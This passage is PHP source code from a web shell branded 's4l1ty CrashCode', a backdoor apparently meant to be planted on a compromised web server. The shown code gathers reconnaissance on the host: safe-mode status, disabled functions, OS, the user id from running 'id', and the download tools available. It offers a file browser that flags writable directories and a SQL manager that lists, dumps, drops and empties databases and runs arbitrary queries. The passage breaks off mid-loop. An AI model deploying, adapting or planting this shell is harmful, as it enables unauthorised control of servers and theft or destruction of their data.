  1091.     if ($disablefunc=@ini_get("disable_functions")){ return "<font color=#FF9900><b>".$disablefunc."</b></font>"; }
  1092.     else { return "<font color=#00FF00><b>NONE</b></b></font>"; }
  1093.   }
  1094.   //Getting Safe Mode Status
  1095.   if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
  1096.     $safemode = TRUE;
  1097.     $hsafemode = "<font color=#3366FF><b>SAFE MODE is ON (Secure)</b></font>";
  1098.   }
  1099.   else {
  1100.     $safemode = FALSE;
  1101.     $hsafemode = "<font color=#FF9900><b>SAFE MODE is OFF (Not Secure)</b></font>";
  1102.   }
  1103.   $v = @ini_get("open_basedir");
  1104.   if ($v or strtolower($v) == "on") {
  1105.     $openbasedir = TRUE;
  1106.     $hopenbasedir = "<font color=red>".$v."</font>";
  1107.   }
  1108.   else {
  1109.     $openbasedir = FALSE;
  1110.     $hopenbasedir = "<font color=green>OFF (not secure)</font>";
  1111.   }
  1112.   $sort = htmlspecialchars($sort);
  1113.   if (empty($sort)) {$sort = $sort_default;}
  1114.   $sort[1] = strtolower($sort[1]);
  1115.   $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  1116.   if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
  1117.   $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
  1118.   @ini_set("highlight.bg",$highlight_bg);
  1119.   @ini_set("highlight.comment",$highlight_comment);
  1120.   @ini_set("highlight.default",$highlight_default);
  1121.   @ini_set("highlight.html",$highlight_html);
  1122.   @ini_set("highlight.keyword",$highlight_keyword);
  1123.   @ini_set("highlight.string",$highlight_string);
  1124.   if (!is_array($actbox)) { $actbox = array(); }
  1125.   $dspact = $act = htmlspecialchars($act);
  1126.   $disp_fullpath = $ls_arr = $notls = null;
  1127.   $ud = urlencode($d);
  1128.   //Directory
  1129.   $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  1130.   if (empty($d)) {$d = realpath(".");}
  1131.   elseif(realpath($d)) {$d = realpath($d);}
  1132.   $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  1133.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  1134.   $d = str_replace("\\\\","\\",$d);
  1135.   $dispd = htmlspecialchars($d);
  1136. /***** HTML START *****/
  1137. echo $html_start;
  1138. echo "<div class=barheader2><h3>$sh_name</h3>--==[s4l1ty CrashCode]==--</div>\n";
  1139. echo "<table id=pagebar><tr><td width=50%><p>".
  1140.      "Software : ".$DISP_SERVER_SOFTWARE ." - <a href=".$surl."act=phpini>php.ini</a><br>".
  1141.      "$hsafemode<br>".
  1142.      "OS : ".php_uname()."<br>";
  1143. if (!$win) { echo "User ID : ".myshellexec("id"); }
  1144. else { echo "User : " . get_current_user(); }
  1145. echo "</p></td>".
  1146.      "<td width=50%><p>Server IP : <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a> - ".
  1147.      "Your IP : <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a><br>";
  1148. if($win){echo "Drives : ".disp_drives($d,$surl)."<br>";}
  1149. echo "Freespace : ".disp_freespace($d);
  1150. echo "</p></td></tr>";
  1151. echo "<tr><td colspan=2><p>";
  1152. echo "MySQL: ".testmysql()." MSSQL: ".testmssql()." Oracle: ".testoracle()." MSSQL: ".testmssql()." PostgreSQL: ".testpostgresql().
  1153.      " cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()."<br>";
  1154. echo "Disabled Functions: ".showdisablefunctions();
  1155. echo "</p></td></tr>";
  1156. echo "<tr><td colspan=2 id=mainmenu>";
  1157. if (count($quicklaunch2) > 0) {
  1158.   foreach($quicklaunch2 as $item) {
  1159.     $item[1] = str_replace("%d",urlencode($d),$item[1]);
  1160.     $item[1] = str_replace("%sort",$sort,$item[1]);
  1161.     $v = realpath($d."..");
  1162.     if (empty($v)) {
  1163.       $a = explode(DIRECTORY_SEPARATOR,$d);
  1164.       unset($a[count($a)-2]);
  1165.       $v = join(DIRECTORY_SEPARATOR,$a);
  1166.     }
  1167.     $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  1168.     echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
  1169.   }
  1170. }
  1171. echo "</td><tr><td colspan=2 id=mainmenu>";
  1172. if (count($quicklaunch1) > 0) {
  1173.   foreach($quicklaunch1 as $item) {
  1174.     $item[1] = str_replace("%d",urlencode($d),$item[1]);
  1175.     $item[1] = str_replace("%sort",$sort,$item[1]);
  1176.     $v = realpath($d."..");
  1177.     if (empty($v)) {
  1178.       $a = explode(DIRECTORY_SEPARATOR,$d);
  1179.       unset($a[count($a)-2]);
  1180.       $v = join(DIRECTORY_SEPARATOR,$a);
  1181.     }
  1182.     $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  1183.     echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
  1184.   }
  1185. }
  1186. echo "</td></tr><tr><td colspan=2>";
  1187. echo "<p class=fleft>";
  1188. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
  1189. $i = 0;
  1190. foreach($pd as $b) {
  1191.   $t = ""; $j = 0;
  1192.   foreach ($e as $r) {
  1193.     $t.= $r.DIRECTORY_SEPARATOR;
  1194.     if ($j == $i) { break; }
  1195.     $j++;
  1196.   }
  1197.   echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=yellow>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>";
  1198.   $i++;
  1199. }
  1200. echo " - ";
  1201. if (is_writable($d)) {
  1202.   $wd = TRUE;
  1203.   $wdt = "<font color=#00FF00>[OK]</font>";
  1204.   echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
  1205. }
  1206. else {
  1207.   $wd = FALSE;
  1208.   $wdt = "<font color=red>[Read-Only]</font>";
  1209.   echo "<b>".view_perms_color($d)."</b>";
  1210. }
  1211. ?>
  1212. </p>
  1213. <div class=fright>
  1214. <form method="POST"><input type=hidden name=act value="ls">
  1215. Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
  1216. </form>
  1217. </div>
  1218. </td></tr></table>
  1219. <?php
  1220. //Information Table
  1221. echo "<table id=maininfo><tr><td width=\"100%\">\n";
  1222. //Action
  1223. if ($act == "") { $act = $dspact = "ls"; }
  1224. if ($act == "phpini" ) { get_phpini(); }
  1225. if ($act == "sql") {
  1226.   $sql_surl = $surl."act=sql";
  1227.   if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  1228.   if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  1229.   if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  1230.   if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  1231.   if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  1232.   $sql_surl .= "&";
  1233.   echo "<h4>Attention! SQL-Manager is <u>NOT</u> a ready module! Don't reports bugs.</h4>".
  1234.        "<table>".
  1235.        "<tr><td width=\"100%\" colspan=2 class=barheader>";
  1236.   if ($sql_server) {
  1237.     $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  1238.     $err = mysql_smarterror();
  1239.     @mysql_select_db($sql_db,$sql_sock);
  1240.     if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
  1241.   }
  1242.   else {$sql_sock = FALSE;}
  1243.   echo ".: SQL Manager :.<br>";
  1244.   if (!$sql_sock) {
  1245.     if (!$sql_server) {echo "NO CONNECTION";}
  1246.     else {echo "Can't connect! ".$err;}
  1247.   }
  1248.   else {
  1249.     $sqlquicklaunch = array();
  1250.     $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  1251.     $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  1252.     $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  1253.     $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  1254.     $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  1255.     $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  1256.     echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
  1257.     if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  1258.   }
  1259.   echo "</td></tr><tr>";
  1260.   if (!$sql_sock) {
  1261.     echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width=\"90%\" height=1 valign=\"top\">";
  1262.     echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\"></td></tr><tr><td></td></tr></form></table></td>";
  1263.   }
  1264.   else {
  1265.     //Start left panel
  1266.     if (!empty($sql_db)) {
  1267.       ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
  1268.       <?php
  1269.      $result = mysql_list_tables($sql_db);
  1270.      if (!$result) {echo mysql_smarterror();}
  1271.      else {
  1272.        echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  1273.         $c = 0;
  1274.         while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
  1275.         if (!$c) {echo "No tables found in database.";}
  1276.       }
  1277.     }
  1278.     else {
  1279.       ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade>
  1280.       <?php
  1281.      $result = mysql_list_dbs($sql_sock);
  1282.      if (!$result) {echo mysql_smarterror();}
  1283.      else {
  1284.        ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
  1285.         <?php
  1286.        $c = 0;
  1287.        $dbs = "";
  1288.        while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
  1289.         echo "<option value=\"\">Databases (".$c.")</option>";
  1290.         echo $dbs;
  1291.       }
  1292.       ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
  1293.       <?php
  1294.    }
  1295.    //End left panel
  1296.    echo "</td><td width=\"100%\">";
  1297.     //Start center panel
  1298.     $diplay = TRUE;
  1299.     if ($sql_db) {
  1300.       if (!is_numeric($c)) {$c = 0;}
  1301.       if ($c == 0) {$c = "no";}
  1302.       echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
  1303.       if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  1304.       echo "</b></center>";
  1305.       $acts = array("","dump");
  1306.       if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1307.       elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
  1308.       elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
  1309.       elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1310.       elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1311.       elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1312.       elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1313.       elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
  1314.       elseif ($sql_tbl_act == "insert") {
  1315.         if ($sql_tbl_insert_radio == 1) {
  1316.           $keys = "";
  1317.           $akeys = array_keys($sql_tbl_insert);
  1318.           foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
  1319.           if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
  1320.           $values = "";
  1321.           $i = 0;
  1322.           foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
  1323.           if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
  1324.           $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
  1325.           $sql_act = "query";
  1326.           $sql_tbl_act = "browse";
  1327.         }
  1328.         elseif ($sql_tbl_insert_radio == 2) {
  1329.           $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
  1330.           $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
  1331.           $result = mysql_query($sql_query) or print(mysql_smarterror());
  1332.           $result = mysql_fetch_array($result, MYSQL_ASSOC);
  1333.           $sql_act = "query";
  1334.           $sql_tbl_act = "browse";
  1335.         }
  1336.       }
  1337.       if ($sql_act == "query") {
  1338.         echo "<hr size=\"1\" noshade>";
  1339.         if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  1340.         if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  1341.         if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
  1342.       }
  1343.       if (in_array($sql_act,$acts)) {
  1344.         ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b>
  1345.         <form action="<?php echo $surl; ?>">
  1346.         <input type="hidden" name="act" value="sql">
  1347.         <input type="hidden" name="sql_act" value="newtbl">
  1348.         <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
  1349.         <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
  1350.         <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
  1351.         <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
  1352.         <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
  1353.         <input type="text" name="sql_newtbl" size="20">
  1354.         <input type="submit" value="Create">
  1355.         </form></td>
  1356.         <td width="30%" height="1"><b>Dump DB:</b>
  1357.         <form action="<?php echo $surl; ?>">
  1358.         <input type="hidden" name="act" value="sql">
  1359.         <input type="hidden" name="sql_act" value="dump">
  1360.         <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
  1361.         <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
  1362.         <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
  1363.         <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
  1364.         <?php
  1365.        if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
  1366.         if ($sql_act == "newtbl") {
  1367.           echo "<b>";
  1368.           if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
  1369.             echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  1370.           }
  1371.           else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1372.         }
  1373.         elseif ($sql_act == "dump") {
  1374.           if (empty($submit)) {
  1375.             $diplay = FALSE;
  1376.             echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
  1377.             echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
  1378.             $v = join (";",$dmptbls);
  1379.             echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
  1380.             if ($dump_file) {$tmp = $dump_file;}
  1381.             else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
  1382.             echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
  1383.             echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
  1384.             echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
  1385.             echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
  1386.             echo "</form>";
  1387.           }
  1388.           else {
  1389.             $diplay = TRUE;
  1390.             $set = array();
  1391.             $set["sock"] = $sql_sock;
  1392.             $set["db"] = $sql_db;
  1393.             $dump_out = "download";
  1394.             $set["print"] = 0;
  1395.             $set["nl2br"] = 0;
  1396.             $set[""] = 0;
  1397.             $set["file"] = $dump_file;
  1398.             $set["add_drop"] = TRUE;
  1399.             $set["onlytabs"] = array();
  1400.             if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
  1401.             $ret = mysql_dump($set);
  1402.             if ($sql_dump_download) {
  1403.               @ob_clean();
  1404.               header("Content-type: application/octet-stream");
  1405.               header("Content-length: ".strlen($ret));
  1406.               header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
  1407.               echo $ret;
  1408.               exit;
  1409.             }
  1410.             elseif ($sql_dump_savetofile) {
  1411.               $fp = fopen($sql_dump_file,"w");
  1412.               if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
  1413.               else {
  1414.                 fwrite($fp,$ret);
  1415.                 fclose($fp);
  1416.                 echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
  1417.               }
  1418.             }
  1419.             else {echo "<b>Dump: nothing to do!</b>";}
  1420.           }
  1421.         }
  1422.         if ($diplay) {
  1423.     if (!empty($sql_tbl)) {
  1424.       if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
  1425.       $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
  1426.       $count_row = mysql_fetch_array($count);
  1427.       mysql_free_result($count);
  1428.       $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
  1429.       $tbl_struct_fields = array();
  1430.       while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
  1431.       if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
  1432.       if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
  1433.       if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
  1434.       if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
  1435.       $perpage = $sql_tbl_le - $sql_tbl_ls;
  1436.       if (!is_numeric($perpage)) {$perpage = 10;}
  1437.       $numpages = $count_row[0]/$perpage;
  1438.       $e = explode(" ",$sql_order);
  1439.       if (count($e) == 2) {
  1440.         if ($e[0] == "d") {$asc_desc = "DESC";}
  1441.         else {$asc_desc = "ASC";}
  1442.         $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
  1443.       }
  1444.       else {$v = "";}
  1445.       $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
  1446.       $result = mysql_query($query) or print(mysql_smarterror());
  1447.       echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
  1448.       echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a>&nbsp;&nbsp;&nbsp;";
  1449.       echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a>&nbsp;&nbsp;&nbsp;";
  1450.       echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a>&nbsp;&nbsp;&nbsp;";
  1451.       echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1452.       if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
  1453.       if ($sql_tbl_act == "insert") {
  1454.         if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
  1455.         if (!empty($sql_tbl_insert_radio)) {  } //Not Ready
  1456.         else {
  1457.           echo "<br><br><b>Inserting row into table:</b><br>";
  1458.           if (!empty($sql_tbl_insert_q)) {
  1459.             $sql_query = "SELECT * FROM `".$sql_tbl."`";
  1460.             $sql_query .= " WHERE".$sql_tbl_insert_q;
  1461.             $sql_query .= " LIMIT 1;";
  1462.             $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
  1463.             $values = mysql_fetch_assoc($result);
  1464.             mysql_free_result($result);
  1465.           }
  1466.           else {$values = array();}
  1467.           echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
  1468.           foreach ($tbl_struct_fields as $field) {
  1469.             $name = $field["Field"];
  1470.             if (empty($sql_tbl_insert_q)) {$v = "";}
  1471.             echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
  1472.             $i++;
  1473.           }
  1474.           echo "</table><br>";
  1475.           echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
  1476.           if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
  1477.           echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
  1478.         }
  1479.       }
  1480.       if ($sql_tbl_act == "browse") {
  1481.         $sql_tbl_ls = abs($sql_tbl_ls);
  1482.         $sql_tbl_le = abs($sql_tbl_le);
  1483.         echo "<hr size=\"1\" noshade>";
  1484.         echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
  1485.         $b = 0;
  1486.         for($i=0;$i<$numpages;$i++) {
  1487.          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
  1488.           echo $i;
